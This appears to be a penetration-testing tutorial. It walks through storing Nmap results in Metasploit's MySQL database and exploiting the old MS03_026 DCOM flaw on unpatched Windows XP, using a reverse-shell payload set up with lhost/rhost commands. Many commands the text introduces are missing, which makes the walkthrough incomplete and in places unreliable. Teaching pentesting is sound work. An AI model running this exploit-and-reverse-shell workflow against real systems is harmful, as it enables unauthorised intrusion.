So you have done some recon on your potential target and now you are on the exploitation phase of your pentest. Metasploit can connect to a database to keep track of the recon you collected on your targets. You can import an xml report from your Nmap scan or you can use the db_nmap command in Metasploit. That is jumping the gun a little. We will first need to bring up Metasploit and then create a database connection to your database of choice. All examples and commands will be done through Backtrack 4 R2.
First lets start mySQL:
Then we will launch Metasploit:
Now we need to tell Metasploit to use the mysql database driver:
Next we will connect Metasploit to the mysql database metasploit:
In the above example we called for the hosts the database contained after connecting. No results is good news as this tells us we are working with a database that does not contain any records.
Lets put some results into the database using the db_nmap command:
Just like the Nmap tutorial I am using a single target machine to show the steps. Lets see what our results are:
At this point we could use db_autopwn and go to town on the targets in the database.
This will surely get you caught in a properly secured environment but we can still use the db_autopwn tool to narrow our exploit search.
Looking through the list we see MS03_026 which is an extremely easy and successful method of attack for unpatched NT computers like XP SP0. More information on MS03_026 can be found by it’s CVE on the NIST website. Information on the Metasploit exploit can be found here. Let’s use this exploit:
As you can see we are dropped into a command prompt for the target by using the following commands:
This command tells Metasploit to use the ms03_026_dcom exploit.
set payload generic/shell_reverse_tcp
This command sets the payload in this case it was a reverse shell. This has the target initiate the connect to our box to evade firewall restrictions. Most firewalls are setup to allow anything out and only a handfull of ports in.
set lhost 192.168.0.29
This commands sets the address to the box that will accept the reverse shell.
set rhost 192.168.0.32
This command sets the address of the target box.
This command tells Metasploit to execute the exploit.
If your exploit was successful then you will see your shell to the target machine. A great place to get more information on Metasploit would be the Offensive-Security.com Metasploit Unleashed course available for free on the Offensive-security.com website. Another great source for metasploit information is “The Metasploit Book” Wiki at wikibooks.